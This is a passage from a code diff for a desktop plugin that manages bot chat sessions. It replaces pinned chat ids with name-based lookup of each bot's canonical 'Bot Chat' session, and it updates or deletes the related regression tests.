openStoredBotChat(name, preferred.resolved_id || preferred.id, preferred) - return pinned - } catch (error) { - // The precise lookup JUST confirmed this session exists, so a failed - // open is transient (reconnect, backend restart). Clearing the pin or - // minting a replacement here would fork the bot's forever-chat on - // every hiccup — report and keep everything as it is. - throw error - } - } - - if (preferred) { - // The stored pointer resolved to a real session, but not to Bot Mode's - // titled plumbing session. Two legitimate ways to get here, and neither - // means "mint a new chat": - // - the pin IS the forever-chat but its title drifted (grandfathered - // pre-convention chats; the LLM auto-titler renaming an untitled row - // after a silent unique-title conflict dropped "Bot Chat"). A pinned - // session carrying real history is the user's conversation — forking - // away from it silently loses their thread, the exact bug this whole - // resolver exists to prevent. The pin is the durable intent: keep it - // and open it, even when some other (likely forked) row holds the - // "Bot Chat" title. The hide sweep only matches plumbing titles, so - // an adopted odd-titled chat is never swept out of the user's - // ordinary session list. - // - the pin resolves to an EMPTY non-plumbing session (a stray draft): - // genuinely corrupted metadata. Clear it — createCanonicalChat then - // adopts the profile's existing "Bot Chat" row if one exists before - // ever creating a new one. - const messageCount = Number(preferred.message_count) || 0 - - if (messageCount > 0) { - await openStoredBotChat(name, preferred.resolved_id || preferred.id, preferred) - return pinned - } - - await saveBotMeta(name, { chat: null }) - return createCanonicalChat(name) - } - - // Definitively gone (db reset, or the lineage was rewritten past - // recovery): re-anchor on the previewed session when there is one. - // A previewed row is safe to re-anchor only when it is Bot Mode plumbing. - // Otherwise a stale pin must not steal the profile's ordinary latest chat. - const recoveryId = isCanonicalBotChatHistory(history) ? history.id : null - if (recoveryId && typeof host.openSession === 'function') { - await openStoredBotChat(name, recoveryId, history) - saveBotMeta(name, { chat: recoveryId }) - return recoveryId - } - saveBotMeta(name, { chat: null }) return createCanonicalChat(name) } -async function prepareBotSource(bot, pinnedChat) { +async function prepareBotSource(bot) { if (!bot.sourceScoped) { - return pinnedChat + return } if (typeof host.ensureAgent !== 'function') { @@ -4439,7 +4214,7 @@ async function prepareBotSource(bot, pinnedChat) { await host.ensureAgent(bot.connectionId, bot.name) if (!bot.remoteSource) { - return pinnedChat + return } const liveId = String(typeof host.activeConnectionId === 'function' ? host.activeConnectionId() || '' : '').trim() @@ -4449,18 +4224,8 @@ async function prepareBotSource(bot, pinnedChat) { throw new Error(`Still on ${liveId || 'this device'}, not ${bot.connectionLabel || targetId}`) } - // Thin rows deliberately omit metadata from the active source. Once their - // owner is active, recover that source's canonical-chat pointer so - // same-named agents never reuse or overwrite each other's pin. - try { - const refreshed = await host.request('profiles.list', {}) - const owner = refreshed?.profiles?.find(profile => profile.name === bot.name) - - return owner?.ui_meta?.['hermes-bots']?.chat || null - } catch { - // Metadata refresh is best-effort; canonical creation remains the fallback. - return null - } + // The canonical chat is found by NAME on the now-active owner source — + // there is no per-source pointer to recover. } function displayName(bot, meta) { @@ -6095,18 +5860,18 @@ function generatedSessionTitle(session, preview) { const ACTIVE_WINDOW_S = 90 /** The session whose activity best represents this bot — the FRESHER of the - * pinned canonical Bot Chat (preferred_session) and the profile's newest - * visible conversation (last_session). + * canonical Bot Chat (canonical_session, the profile's "Bot Chat" registry + * row resolved server-side by name) and the profile's newest visible + * conversation (last_session). * * Canonical Bot Chats are hidden from the session list by design, so * last_session alone never sees them: a bot you talk to all day through its * Bot Chat reads "6d ago" because its newest VISIBLE session is a week old. - * #88690 moved the preview text to preferred_session but left every activity - * signal (age label, pulse dot, unread watermark, recency sort) on - * last_session. All of them key off this helper now. Older gateways without - * the preferred_session resolver degrade to last_session unchanged. */ + * Every activity signal (age label, pulse dot, unread watermark, recency + * sort) keys off this helper. Older gateways without the canonical_session + * field degrade to last_session unchanged. */ function botActivitySession(bot) { - const preferred = bot?.preferred_session + const preferred = bot?.canonical_session const last = bot?.last_session if (!preferred || !last) { @@ -6173,7 +5938,7 @@ function BotRow({ bot, onDelete, onEdit, onGroup }) { // (age label, pulse dot) follow the same rule via botActivitySession: // the canonical Bot Chat is hidden from last_session, so keying age off // last_session alone shows "6d ago" on a bot you just messaged. - const previewSession = bot.preferred_session || last + const previewSession = bot.canonical_session || last const activitySession = botActivitySession(bot) // A live kanban/tool worker counts as activity (#90268): pulse + fresh // age while it runs, falling back to chat activity when it ends. @@ -6241,8 +6006,6 @@ function BotRow({ bot, onDelete, onEdit, onGroup }) { return } - let pinnedChat = meta?.chat - if (!bot.remoteSource && $botUnread.get()[bot.name]) { const next = { ...$botUnread.get() } delete next[bot.name] @@ -6252,7 +6015,7 @@ function BotRow({ bot, onDelete, onEdit, onGroup }) { // Activate the owner first so every canonical-chat RPC lands on the // backend that owns this bot's state database. try { - pinnedChat = await prepareBotSource(bot, pinnedChat) + await prepareBotSource(bot) } catch (error) { host.notifyError?.(error, `Could not reach ${bot.connectionLabel || 'the remote source'}`) @@ -6264,13 +6027,10 @@ function BotRow({ bot, onDelete, onEdit, onGroup }) { } try { - // `previewSession` prefers the PIN, and so does the click — preview - // identity and click identity are the same session by construction - // (#88200). The roster's freshest visible session is deliberately NOT - // passed: the row's job is to land in the bot's forever-chat, which is - // the only door to it (canonical Bot Chats are always hidden from the - // Sessions sidebar). - const id = await openBotCanonicalChat(bot.name, pinnedChat, previewSession) + // Identity is the NAMED registry row (profile → session titled + // "Bot Chat"), resolved fresh on every click — preview identity and + // click identity agree because both describe that same row (#88200). + const id = await openBotCanonicalChat(bot.name) if (generation === botOpenGeneration && id) { return @@ -11315,10 +11075,8 @@ function BotsPane() { } void (async () => { - let pinnedChat = botRosterMeta(bot, allMeta)?.chat - try { - pinnedChat = await prepareBotSource(bot, pinnedChat) + await prepareBotSource(bot) } catch (error) { host.notifyError?.(error, `Could not reach ${bot.connectionLabel || 'the remote source'}`) @@ -11330,11 +11088,7 @@ function BotsPane() { } try { - const id = await openBotCanonicalChat( - bot.name, - pinnedChat, - bot.preferred_session || bot.last_session - ) + const id = await openBotCanonicalChat(bot.name) if (generation === botOpenGeneration && id) { return @@ -11854,11 +11608,17 @@ export default { if (slashNew) { const activeBot = $selectedBot.get() - const meta = activeBot ? $botMeta.get()[activeBot] : null - const pinnedId = meta?.chat || null + // Canonical identity is the profile's "Bot Chat" registry row — + // read it from the roster cache (canonical_session, resolved + // server-side by name), matching either the durable row id or + // the compression-lineage tip currently on screen. + const roster = $lastRoster.get() + const row = Array.isArray(roster) ? roster.find(bot => bot?.name === activeBot) : null + const canonical = row?.canonical_session || null const currentId = host.activeSessionId?.get?.() ?? null + const canonicalIds = [canonical?.id, canonical?.resolved_id].filter(Boolean).map(String) - if (activeBot && pinnedId && currentId && String(currentId) === String(pinnedId)) { + if (activeBot && currentId && canonicalIds.includes(String(currentId))) { host.notify({ kind: 'info', title: 'This chat never resets', diff --git a/apps/desktop/src/plugins/hermes-bots/tests/active-now-strip.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/active-now-strip.test.mjs index 057b61e46b..6d921aa75c 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/active-now-strip.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/active-now-strip.test.mjs @@ -84,11 +84,11 @@ test('roster without profiles never throws', () => { // ── botActivitySession: canonical Bot Chat activity counts (hermes-agent "6d ago" bug) ── -test('botActivitySession picks the fresher preferred_session over a stale last_session', () => { +test('botActivitySession picks the fresher canonical_session over a stale last_session', () => { const botActivitySession = loadBotActivitySession() const bot = { // Canonical Bot Chat (hidden from session lists): messaged seconds ago. - preferred_session: { id: 'bot-chat', last_active: NOW / 1000 - 5, preview: 'fresh DM' }, + canonical_session: { id: 'bot-chat', last_active: NOW / 1000 - 5, preview: 'fresh DM' }, // Newest VISIBLE session: 6 days old — what last_session alone reports. last_session: { id: 'old-scratch', last_active: NOW / 1000 - 6 * 86400, preview: 'ancient' } } @@ -98,7 +98,7 @@ test('botActivitySession picks the fresher preferred_session over a stale last_s test('botActivitySession keeps last_session when it is the fresher one', () => { const botActivitySession = loadBotActivitySession() const bot = { - preferred_session: { id: 'bot-chat', last_active: NOW / 1000 - 3600 }, + canonical_session: { id: 'bot-chat', last_active: NOW / 1000 - 3600 }, last_session: { id: 'scratch', last_active: NOW / 1000 - 10 } } assert.equal(botActivitySession(bot).id, 'scratch') @@ -107,7 +107,7 @@ test('botActivitySession keeps last_session when it is the fresher one', () => { test('botActivitySession degrades to whichever side exists (older gateways / no pin)', () => { const botActivitySession = loadBotActivitySession() assert.equal(botActivitySession({ last_session: { id: 'only', last_active: 1 } }).id, 'only') - assert.equal(botActivitySession({ preferred_session: { id: 'pin', last_active: 1 } }).id, 'pin') + assert.equal(botActivitySession({ canonical_session: { id: 'pin', last_active: 1 } }).id, 'pin') assert.equal(botActivitySession({}), null) assert.equal(botActivitySession(null), null) }) @@ -117,7 +117,7 @@ test('activeBots counts Bot Chat activity that last_session cannot see', () => { const bots = [ { name: 'default', - preferred_session: { last_active: NOW / 1000 - 5 }, + canonical_session: { last_active: NOW / 1000 - 5 }, last_session: { last_active: NOW / 1000 - 6 * 86400 } } ] @@ -179,7 +179,6 @@ test('ActiveNowStrip renders above the roster, is a live region, and is click-ac // a list key; a `key:` prop leaves chips unkeyed (index identity). assert.match(source, /\}, botRosterKey\(bot\)\)\s*\}\)\s*\]\s*\}\)\s*\}\s*\/\*\* Assign a bot to a group/s) assert.match(source, /jsx\(BotFace,\s*\{[\s\S]*?mood: 'work'/) - assert.match(source, /let pinnedChat = botRosterMeta\(bot, allMeta\)\?\.chat/) - assert.match(source, /await prepareBotSource\(bot, pinnedChat\)/) - assert.match(source, /bot\.preferred_session \|\| bot\.last_session/) + assert.match(source, /await prepareBotSource\(bot\)/) + assert.match(source, /bot\.canonical_session \|\| last/) }) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/activity-toasts.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/activity-toasts.test.mjs index 3ba2d2968e..9b7a5d3e1b 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/activity-toasts.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/activity-toasts.test.mjs @@ -77,13 +77,13 @@ test('pref defaults OFF and persists via ctx.storage under activity-toasts', () test('activity in the hidden canonical Bot Chat still badges (the "6d ago" class)', () => { // The canonical Bot Chat is hidden from session lists, so last_session - // never advances when a DM lands there — only preferred_session does. + // never advances when a DM lands there — only canonical_session does. const t = loadTracker(false) const at = ts => [ { name: 'researcher', last_session: { last_active: 100, preview: 'ancient scratch chat' }, - preferred_session: { last_active: ts, preview: 'Message from writer: hi' } + canonical_session: { last_active: ts, preview: 'Message from writer: hi' } } ] t.trackInboundActivity(at(150)) // seeding poll diff --git a/apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-canonical-chat.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-canonical-chat.test.mjs deleted file mode 100644 index 3205326248..0000000000 --- a/apps/desktop/src/plugins/hermes-bots/tests/bot-row-opens-canonical-chat.test.mjs +++ /dev/null @@ -1,256 +0,0 @@ -import assert from 'node:assert/strict' -import { readFileSync } from 'node:fs' -import test from 'node:test' -import vm from 'node:vm' - -const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') - -/** - * A bot row must open the bot's canonical, pinned Bot Chat. - * - * This file previously asserted the opposite — that a row opens the user's - * NEWEST visible conversation — after a report that a freshly started chat - * seemed to vanish when clicking away and back. That preference was reverted - * (2026-08-22): canonical Bot Chats are ALWAYS hidden from the Sessions - * sidebar (see hide-bot-chats.test.mjs), so the bot row is the ONLY door to - * the forever-chat. Preferring a newer session made the pinned relationship - * unreachable from anywhere in the UI — a user lost an entire bot-building - * history behind a row that previewed one session and opened another. - * - * The original complaint has a non-destructive answer: scratch sessions from - * "New chat with this agent" are not plumbing-titled, so the hide sweep leaves - * them visible in the Sessions sidebar. They are reachable there; they are - * simply not what the bot row targets. - * - * Documented contract (docs/user-guide/bot-mode): "Click a Bot to land in its - * chat — every Bot has a canonical, persistent Bot Chat conversation that is - * created (and pinned) the moment the Bot is born." - */ -function loadOpenPath({ openSession, request }) { - const start = source.indexOf('const canonicalCreations = new Map()') - const end = source.indexOf('function displayName(', start) - - assert.notEqual(start, -1, 'canonical creation section is missing') - assert.notEqual(end, -1, 'canonical creation section delimiter is missing') - - const saved = [] - const opened = [] - const context = { - host: { - openSession: async (id, options) => { - opened.push({ id, options }) - - return openSession(id, options) - }, - request: async (method, params) => request(method, params) - }, - saveBotMeta: (name, patch) => saved.push({ name, patch: JSON.parse(JSON.stringify(patch)) }), - $hideBotChats: { get: () => false }, - window: { setTimeout: callback => callback() } - } - - const section = source - .slice(start, end) - .concat('\nglobalThis.__open = { openBotCanonicalChat, newerVisibleBotChat };\n') - - vm.runInNewContext(section, context, { filename: 'canonical-open.js' }) - - return { ...context.__open, saved, opened } -} - -const noRequests = async () => ({}) - -/** A live, healthy pin: `profiles.list` resolves it to the canonical Bot Chat. - * That verification is the gate the newer-conversation preference sits behind - * — with a dead or unverified pin the bot must NOT adopt the profile's latest - * row (that would claim an unrelated conversation). */ -const healthyPin = - (pinned = 'pinned-bot-chat') => - async (method, params) => { - if (method === 'profiles.list') { - const name = Object.keys(params?.preferred_session_ids ?? { ops: 1 })[0] - - return { - profiles: [{ name, preferred_session: { id: pinned, resolved_id: pinned, title: 'Bot Chat' } }] - } - } - - return {} - } - -test('a healthy pin wins over a newer conversation — the row lands in the Bot Chat', async () => { - const runtime = loadOpenPath({ openSession: async () => undefined, request: healthyPin() }) - - // The roster's freshest visible session is a real conversation the user - // started after the pin was made. It must NOT displace the forever-chat: - // the pinned chat is hidden from Sessions, so the row is its only door, - // while this newer session remains reachable in the Sessions sidebar. - const history = { id: 'new-chat', title: '릴시아 카피 회의', message_count: 12, last_active: 9000 } - - const result = await runtime.openBotCanonicalChat('plan', 'pinned-bot-chat', history, history) - - assert.equal(result, 'pinned-bot-chat', 'should return the pinned Bot Chat') - assert.equal(runtime.opened.length, 1) - assert.equal(runtime.opened[0].id, 'pinned-bot-chat', 'must open the pinned forever-chat') - assert.equal(runtime.opened[0].options.profile, 'plan') - assert.equal( - runtime.opened[0].options.keepAllProfilesScope, - false, - 'clicking a bot moves the workspace onto that bot' - ) -}) - -/** - * The REAL call shape from the roster row: `previewSession` is - * `bot.preferred_session || last`, so on a pinned bot it resolves to the PIN. - * Preview identity and click identity are the same session by construction - * (#88200) — which is exactly the property the reverted newer-session - * preference broke. - */ -test('real roster call: preview identity and click identity are the same session', async () => { - const runtime = loadOpenPath({ openSession: async () => undefined, request: healthyPin('pin-1') }) - - const pinnedPreview = { id: 'pin-1', title: 'Bot Chat', preview: 'plumbing' } - - // Mirrors: openBotCanonicalChat(bot.name, pinnedChat, previewSession) - const result = await runtime.openBotCanonicalChat('plan', 'pin-1', pinnedPreview) - - assert.equal(result, 'pin-1', 'must open the pinned Bot Chat the row previewed') - assert.equal(runtime.opened[0].id, 'pin-1') -}) - -/** Regression guard for the revert: the open path must not consult the - * newer-visible-session predicate while the pin is alive. Bot Chats are - * hidden from Sessions, so a row that prefers a newer session strands the - * forever-chat with no reachable entry point. */ -test('the healthy-pin branch never prefers a newer visible session', () => { - const start = source.indexOf('if (preferred && isCanonicalBotChatHistory(preferred)) {') - const end = source.indexOf('if (preferred) {', start) - - assert.notEqual(start, -1, 'healthy-pin branch is missing') - - const branch = source.slice(start, end) - - assert.equal( - branch.includes('newerVisibleBotChat('), - false, - 'a healthy pin must be opened directly — no newer-session preference' - ) -}) - -test('the canonical Bot Chat itself never counts as "newer" (it IS the pin)', () => { - const runtime = loadOpenPath({ openSession: async () => undefined, request: noRequests }) - - assert.equal(runtime.newerVisibleBotChat('pin-1', { id: 'hidden-plumbing', title: 'Bot Chat' }), null) - assert.equal( - runtime.newerVisibleBotChat('pin-1', { id: 'hidden-plumbing', root_title: 'Bot Chat', title: '자동 제목' }), - null - ) -}) - -test('an empty draft never displaces the pinned conversation', () => { - const runtime = loadOpenPath({ openSession: async () => undefined, request: noRequests }) - - assert.equal(runtime.newerVisibleBotChat('pin-1', { id: 'blank', title: '', message_count: 0 }), null) -}) - -test('a gateway that omits message_count still yields the newer session', () => { - const runtime = loadOpenPath({ openSession: async () => undefined, request: noRequests }) - - assert.equal(runtime.newerVisibleBotChat('pin-1', { id: 'legacy', title: '대화' }), 'legacy') -}) - -test('history that IS the pin changes nothing', () => { - const runtime = loadOpenPath({ openSession: async () => undefined, request: noRequests }) - - assert.equal(runtime.newerVisibleBotChat('same-id', { id: 'same-id', title: '대화', message_count: 5 }), null) -}) - -/** - * Every path that mounts a bot's chat must move the workspace onto that bot. - * - * `keepAllProfilesScope` defaults to TRUE in the SDK, which keeps - * `$activeGatewayProfile` pointing at whatever profile was active before the - * click. Bot Mode wants the opposite: clicking a bot IS a profile switch, and - * leaving the scope behind meant sessions created afterwards were filed under - * the previous bot's profile (measured: four new chats started from three - * different bots all landed in `ops`). - * - * The newly-minted-chat path is asserted separately from the stored-chat path - * because they are different call sites; a guard on only one of them let the - * other regress silently. - */ -function creationRuntime({ failFirstOpen = false } = {}) { - let opens = 0 - - return loadOpenPath({ - openSession: async () => { - opens += 1 - - if (failFirstOpen && opens === 1) { - throw new Error('stored row not persisted yet') - } - - return undefined - }, - request: async method => { - if (method === 'session.create') { - return { stored_session_id: 'fresh-stored', session_id: 'fresh-runtime' } - } - - return {} - } - }) -} - -test('a newly minted Bot Chat opens with the workspace following the bot', async () => { - const runtime = creationRuntime() - - // No pin and no adoptable history — the real "first click on a bot" path. - const result = await runtime.openBotCanonicalChat('plan', null, null, null) - - assert.equal(result, 'fresh-stored') - assert.ok(runtime.opened.length >= 1, 'the new chat is mounted') - - for (const entry of runtime.opened) { - assert.equal(entry.options.keepAllProfilesScope, false, 'creating a bot chat must move the workspace onto that bot') - assert.equal(entry.options.profile, 'plan') - } -}) - -test('the post-kickoff retry open also follows the bot', async () => { - const runtime = creationRuntime({ failFirstOpen: true }) - - await runtime.openBotCanonicalChat('plan', null, null, null) - - assert.equal(runtime.opened.length, 2, 'first open fails, retry runs after the kickoff') - assert.equal( - runtime.opened[1].options.keepAllProfilesScope, - false, - 'the retry must not silently fall back to the SDK default' - ) -}) - -/** With the newer-session preference gone there is no "try the newer chat, - * fall back to the pin" dance: a verified pin is opened directly, and a - * failed open of a JUST-verified session is transient (reconnect, backend - * restart), so it propagates rather than forking the forever-chat. */ -test('a failed open of a verified pin surfaces instead of forking the chat', async () => { - const runtime = loadOpenPath({ - openSession: async () => { - throw new Error('session not found') - }, - request: healthyPin('pin-1') - }) - - await assert.rejects( - () => runtime.openBotCanonicalChat('ops', 'pin-1', { id: 'pin-1', title: 'Bot Chat' }), - /session not found/ - ) - - assert.deepEqual( - runtime.saved, - [], - 'a transient failure must not clear the pin or mint a replacement' - ) -}) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-adopt-before-mint.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-adopt-before-mint.test.mjs deleted file mode 100644 index 06d9825240..0000000000 --- a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-adopt-before-mint.test.mjs +++ /dev/null @@ -1,155 +0,0 @@ -import assert from 'node:assert/strict' -import { readFileSync } from 'node:fs' -import test from 'node:test' -import vm from 'node:vm' - -// Regression suite for the infinite-fork loop (hermes-agent#88200 follow-up): -// the core UNIQUE title index means at most one session per profile db holds -// the "Bot Chat" title. When a fork squats it, every later mint's title is -// silently dropped, the LLM titler renames the untitled row, and the next -// title-based identity check misreads the fresh chat as "not plumbing" — -// clearing the pin and minting again, forever. Two invariants kill the loop: -// 1. createCanonicalChat ADOPTS an existing "Bot Chat" row before creating. -// 2. A pin that resolves to a NON-plumbing session with real history is the -// user's conversation — keep it; only an empty stray draft is replaced. - -const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') - -function loadOpenPath({ openSession, request }) { - const start = source.indexOf('const canonicalCreations = new Map()') - const end = source.indexOf('function displayName(', start) - const saved = [] - const requests = [] - const context = { - host: { - openSession, - request: async (method, params) => { - requests.push({ method, params: JSON.parse(JSON.stringify(params ?? null)) }) - return request(method, params) - } - }, - saveBotMeta: (name, patch) => saved.push({ name, patch: JSON.parse(JSON.stringify(patch)) }), - $hideBotChats: { get: () => false }, - window: { setTimeout: callback => callback() } - } - const section = source - .slice(start, end) - .concat('\nglobalThis.__open = { createCanonicalChat, openBotCanonicalChat };\n') - - assert.notEqual(start, -1, 'canonical creation section is missing') - assert.notEqual(end, -1, 'canonical creation section delimiter is missing') - vm.runInNewContext(section, context, { filename: 'canonical-adopt.js' }) - return { ...context.__open, saved, requests } -} - -// ── invariant 1: adopt-before-mint ────────────────────────────────────────── - -test('createCanonicalChat adopts an existing hidden "Bot Chat" row instead of creating', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => { - if (method === 'session.list') { - return { - sessions: [ - { id: 'newer-ordinary', title: 'help me with x', message_count: 12 }, - { id: 'real-forever-chat', title: 'Bot Chat', message_count: 930 } - ] - } - } - if (method === 'session.create') { - throw new Error('must not create: the profile already owns a Bot Chat') - } - return {} - } - }) - - assert.equal(await runtime.createCanonicalChat('ops'), 'real-forever-chat') - assert.deepEqual(runtime.saved, [{ name: 'ops', patch: { chat: 'real-forever-chat' } }]) - const list = runtime.requests.find(r => r.method === 'session.list') - assert.equal(list?.params?.include_hidden, true, - 'adoption scan must see hidden rows — canonical chats are always hidden') -}) - -test('createCanonicalChat still creates when no Bot Chat row exists', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => { - if (method === 'session.list') { - return { sessions: [{ id: 'ordinary', title: 'help me with x', message_count: 3 }] } - } - if (method === 'session.create') return { stored_session_id: 'fresh-1', session_id: 'rt-1' } - return {} - } - }) - - assert.equal(await runtime.createCanonicalChat('newbie'), 'fresh-1') -}) - -test('createCanonicalChat mints when the adoption scan fails (older gateway)', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => { - if (method === 'session.list') throw new Error('unknown method') - if (method === 'session.create') return { stored_session_id: 'fresh-2', session_id: 'rt-2' } - return {} - } - }) - - assert.equal(await runtime.createCanonicalChat('legacy'), 'fresh-2') -}) - -// ── invariant 2: a resolving pin with history is never abandoned ──────────── - -test('pin resolving to a renamed session WITH history keeps the pin (no fork)', async () => { - const opened = [] - const runtime = loadOpenPath({ - openSession: async id => opened.push(id), - request: async method => { - if (method === 'profiles.list') { - return { - profiles: [{ - name: 'ops', - preferred_session: { - id: 'grandfathered', resolved_id: 'grandfathered', - root_title: 'Use computer use to inspect…', title: 'Use computer use to inspect…', - message_count: 930 - } - }] - } - } - if (method === 'session.create') throw new Error('must not fork a chat with 930 messages') - return {} - } - }) - - assert.equal(await runtime.openBotCanonicalChat('ops', 'grandfathered', null), 'grandfathered') - assert.equal(opened.includes('grandfathered'), true) - assert.deepEqual(runtime.saved, [], 'pin must not be cleared or rewritten') -}) - -test('pin resolving to an EMPTY stray draft is replaced via adoption, not a blind mint', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => { - if (method === 'profiles.list') { - return { - profiles: [{ - name: 'ops', - preferred_session: { id: 'stray', resolved_id: 'stray', root_title: 'Untitled', title: 'Untitled', message_count: 0 } - }] - } - } - if (method === 'session.list') { - return { sessions: [{ id: 'real-forever-chat', title: 'Bot Chat', message_count: 42 }] } - } - if (method === 'session.create') throw new Error('must adopt the existing Bot Chat') - return {} - } - }) - - assert.equal(await runtime.openBotCanonicalChat('ops', 'stray', null), 'real-forever-chat') - assert.deepEqual(runtime.saved, [ - { name: 'ops', patch: { chat: null } }, - { name: 'ops', patch: { chat: 'real-forever-chat' } } - ]) -}) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-creation.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-creation.test.mjs index dc468d1f65..e5b069bdd5 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-creation.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-creation.test.mjs @@ -8,11 +8,8 @@ const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') function loadCanonicalCreation({ openSession, request }) { const start = source.indexOf('const canonicalCreations = new Map()') const end = source.indexOf('function displayName(', start) - const saved = [] const context = { host: { openSession, request }, - saveBotMeta: (name, patch) => saved.push({ name, patch }), - $hideBotChats: { get: () => false }, window: { setTimeout: callback => callback() } } const section = source @@ -22,7 +19,7 @@ function loadCanonicalCreation({ openSession, request }) { assert.notEqual(start, -1, 'canonical creation section is missing') assert.notEqual(end, -1, 'canonical creation section delimiter is missing') vm.runInNewContext(section, context, { filename: 'canonical-creation.js' }) - return { ...context.__canonical, saved } + return { ...context.__canonical } } test('regression: navigation retries after the kickoff persists a new canonical chat', async () => { @@ -45,7 +42,7 @@ test('regression: navigation retries after the kickoff persists a new canonical assert.deepEqual(events, ['open:stored-1', 'kickoff:persisted', 'open:stored-1']) }) -test('regression: a failed intro keeps the pin', async () => { +test('regression: a failed intro still returns the created registry row', async () => { const runtime = loadCanonicalCreation({ openSession: async () => undefined, request: async method => { @@ -55,8 +52,7 @@ test('regression: a failed intro keeps the pin', async () => { } }) + // The chat exists under the canonical title — the next click finds it by + // NAME (the registry), so a failed kickoff can never orphan or fork it. assert.equal(await runtime.createCanonicalChat('newbie'), 'new-bot-chat') - assert.deepEqual(JSON.parse(JSON.stringify(runtime.saved)), [ - { name: 'newbie', patch: { chat: 'new-bot-chat' } } - ]) }) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-empty-recovery.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-empty-recovery.test.mjs deleted file mode 100644 index 76a93ffa41..0000000000 --- a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-empty-recovery.test.mjs +++ /dev/null @@ -1,117 +0,0 @@ -import assert from 'node:assert/strict' -import { readFileSync } from 'node:fs' -import test from 'node:test' -import vm from 'node:vm' - -const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') - -function loadCanonicalRecovery({ openSession, request }) { - const start = source.indexOf('const canonicalCreations = new Map()') - const end = source.indexOf('function displayName(', start) - const saved = [] - const requests = [] - const context = { - host: { - openSession, - request: async (method, params) => { - requests.push(method) - return request(method, params) - } - }, - saveBotMeta: (name, patch) => saved.push({ name, patch }), - $hideBotChats: { get: () => false }, - window: { setTimeout: callback => callback() } - } - const section = source.slice(start, end).concat('\nglobalThis.__canonical = { openBotCanonicalChat };\n') - - assert.notEqual(start, -1, 'canonical chat section is missing') - assert.notEqual(end, -1, 'canonical chat section delimiter is missing') - vm.runInNewContext(section, context, { filename: 'canonical-recovery.js' }) - return { ...context.__canonical, saved, requests } -} - -test('regression: a definitively-gone pin with no history clears and creates a replacement', async () => { - // New contract (hermes-agent#88200): the pin is verified through the - // backend's precise preferred_session resolver — NOT a paginated, - // hidden-excluding session.list window. preferred_session=null is the - // definitive "this session is gone"; with no previewed history to - // re-anchor on, recovery clears the pin and creates a fresh chat. - const opened = [] - const runtime = loadCanonicalRecovery({ - openSession: async id => opened.push(id), - request: async method => { - if (method === 'profiles.list') return { profiles: [{ name: 'ops', preferred_session: null }] } - if (method === 'session.create') return { stored_session_id: 'replacement', session_id: 'replacement-runtime' } - return {} - } - }) - - assert.equal(await runtime.openBotCanonicalChat('ops', 'stale-pin', null), 'replacement') - assert.deepEqual(opened, ['replacement']) - assert.deepEqual(JSON.parse(JSON.stringify(runtime.saved)), [ - { name: 'ops', patch: { chat: null } }, - { name: 'ops', patch: { chat: 'replacement' } } - ]) -}) - -test('regression: an unpinned bot adopts its previewed chat instead of creating another', async () => { - // A CLI/A2A exchange can create the canonical chat before the desktop - // saves ui_meta.chat. Grandfathering adopts the session the row already - // previews (the roster's last_session) rather than minting a new one. - const opened = [] - const runtime = loadCanonicalRecovery({ - openSession: async id => opened.push(id), - request: async method => { - if (method === 'session.create') throw new Error('must not create') - return {} - } - }) - - const history = { id: 'existing-canonical', title: 'Bot Chat', preview: 'hey', last_active: 5 } - assert.equal(await runtime.openBotCanonicalChat('ops', null, history), 'existing-canonical') - assert.deepEqual(opened, ['existing-canonical']) - assert.deepEqual(JSON.parse(JSON.stringify(runtime.saved)), [ - { name: 'ops', patch: { chat: 'existing-canonical' } } - ]) -}) - -test('regression: a dead pin re-anchors on the previewed chat instead of the newest session', async () => { - // hermes-agent#88146: recovery must never steal an unrelated scratch - // session. A pin the backend reports definitively gone re-anchors on the - // previewed history row when one exists — session.create never fires. - const opened = [] - const runtime = loadCanonicalRecovery({ - openSession: async id => opened.push(id), - request: async method => { - if (method === 'profiles.list') return { profiles: [{ name: 'ops', preferred_session: null }] } - if (method === 'session.create') throw new Error('must not create') - return {} - } - }) - - const history = { id: 'the-real-bot-chat', title: 'Bot Chat', preview: 'p', last_active: 9 } - assert.equal(await runtime.openBotCanonicalChat('ops', 'old-pin', history), 'the-real-bot-chat') - assert.deepEqual(opened, ['the-real-bot-chat']) - assert.deepEqual(JSON.parse(JSON.stringify(runtime.saved)), [ - { name: 'ops', patch: { chat: 'the-real-bot-chat' } } - ]) -}) - -test('regression: an inconclusive lookup opens the stored pin as-is and never rewrites it', async () => { - // hermes-agent#88146: an older backend (profiles.list without the - // preferred_session_ids param) or a transient hiccup is NOT proof the pin - // is gone. The pin is opened as-is; nothing is saved, nothing is created. - const opened = [] - const runtime = loadCanonicalRecovery({ - openSession: async id => opened.push(id), - request: async method => { - if (method === 'profiles.list') return { profiles: [{ name: 'ops' }] } - if (method === 'session.create') throw new Error('must not create') - return {} - } - }) - - assert.equal(await runtime.openBotCanonicalChat('ops', 'old-pin-outside-page', null), 'old-pin-outside-page') - assert.deepEqual(opened, ['old-pin-outside-page']) - assert.equal(runtime.saved.length, 0) -}) diff --git 